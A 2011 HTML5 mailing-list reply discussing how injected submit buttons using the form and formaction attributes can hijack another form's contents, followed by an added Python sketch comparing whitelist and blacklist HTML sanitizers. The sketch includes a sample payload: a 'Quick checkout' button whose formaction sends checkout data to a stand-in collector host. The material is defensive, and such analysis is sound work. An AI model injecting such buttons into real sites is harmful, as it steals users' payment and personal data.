Re: [html5] Input attributes allow form tampering

On Tue, 2011-08-02 at 21:50 +0000, Ian Hickson wrote:
> On Tue, 2 Aug 2011, Philippe De Ryck wrote:
> >
> > The new form attributes, which can be used with submit buttons, can make 
> > it difficult for a user to distinguish the form that is being submitted. 
> > This can be used by an adversary to trick the user into submitting a 
> > form, such as an autocompleted login form. Even though this attack was 
> > already possible with JavaScript enabled, this new vector does not 
> > depend on scripts. Additionally, it is possible that current content 
> > validation filters do not yet prevent against button injection.
> 
> Surely this was already possible by just injecting </form><form action...> 
> in the same place as the button would be inserted today?

It is indeed very likely that form injection would also be possible. The
difference, however, is that by injecting a button, you can trick the user
into submitting a form that is located somewhere else on the page. In
contrast to an injected form, which needs to be explicitly filled out by
the user, the button can steal another form's contents (e.g. a purchase
form where you enter your details (Address, CC, ...), where an attacker
can inject a "quick checkout" button).

> 
> > Alternatively, if changing the specification is not possible, developers 
> > should be warned about this attack vector, so they can update their 
> > content filters.
> 
> Filters must be written using whitelists. A filter written using a 
> blacklist is essentially worthless. A whitelist filter would not be 
> affected by this or many other additions to HTML.

I agree with the whitelisting vs blacklisting (although blacklists will
be used in practice), and see that you have included a general security
section warning against blacklists.

-- 
Philippe De Ryck
K.U.Leuven, Dept. of Computer Science


Disclaimer: http://www.kuleuven.be/cwis/email_disclaimer.htm

Received on Wednesday, 3 August 2011 09:20:32 UTC
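
Added example, not part of the original thread: a minimal Python sketch of the whitelist-versus-blacklist point discussed above, run over a constructed comment that injects a submit button using the HTML5 `form` and `formaction` attributes. The tag policy, the blacklist contents, the sample markup and the names `sanitize`, `allow_keep` and `deny_keep` are all assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Assumed policy for user-supplied markup: tag -> attributes permitted on it.
ALLOWED = {"p": set(), "b": set(), "i": set(), "em": set(), "a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")
# Constructed stand-in for a blacklist written before the new attributes existed.
DENY_TAGS = {"script", "iframe", "object", "embed", "form"}
# Constructed input: an injected submit button bound to a form elsewhere on the page.
SAMPLE = ('<p>Nice post</p><button form="checkout" '
          'formaction="https://collector.example/c">Quick checkout</button>')

def allow_keep(tag, attr, value):
    """Whitelist: keep only tags and attributes that are explicitly listed."""
    if tag not in ALLOWED:
        return False
    if attr is None:            # the question is about the tag itself
        return True
    if attr not in ALLOWED[tag]:
        return False
    return attr != "href" or value.lower().startswith(SAFE_SCHEMES)

def deny_keep(tag, attr, value):
    """Blacklist: keep everything except what is already known to be dangerous."""
    if tag in DENY_TAGS:
        return False
    return attr is None or not attr.startswith("on")

class _Filter(HTMLParser):
    def __init__(self, keep):
        super().__init__(convert_charrefs=True)
        self.keep, self.out = keep, []
    def handle_starttag(self, tag, attrs):
        if self.keep(tag, None, ""):
            kept = "".join(' %s="%s"' % (k, escape(v or "", quote=True))
                           for k, v in attrs if self.keep(tag, k, v or ""))
            self.out.append("<%s%s>" % (tag, kept))
    def handle_endtag(self, tag):
        if self.keep(tag, None, ""):
            self.out.append("</%s>" % tag)
    def handle_data(self, data):    # text of dropped elements survives, escaped
        self.out.append(escape(data, quote=False))

def sanitize(markup, keep):
    parser = _Filter(keep)
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)
```

With `deny_keep` the button and both attributes pass through unchanged, because nothing in the blacklist anticipated them; with `allow_keep` only the paragraph and the button's text remain.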